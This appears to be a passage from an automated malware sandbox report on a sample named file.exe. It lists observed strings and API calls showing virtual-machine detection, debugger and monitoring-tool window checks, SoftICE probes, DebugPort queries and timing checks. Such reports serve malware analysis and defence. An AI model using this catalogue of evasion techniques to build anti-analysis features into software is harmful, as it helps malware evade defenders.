Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AE7D5 rdtsc 0_2_009AE7D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EECABB push dword ptr fs:[00000030h] 0_2_00EECABB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B50D90 mov eax, dword ptr fs:[00000030h] 0_2_04B50D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5092B mov eax, dword ptr fs:[00000030h] 0_2_04B5092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004099EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A6E0 SetUnhandledExceptionFilter, 0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B59C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04B59C51
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04B5A7B1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04B5D00A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5A947 SetUnhandledExceptionFilter, 0_2_04B5A947
Source: file.exe, file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: z?wProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D196AC cpuid 0_3_04D196AC
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_004107E2
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe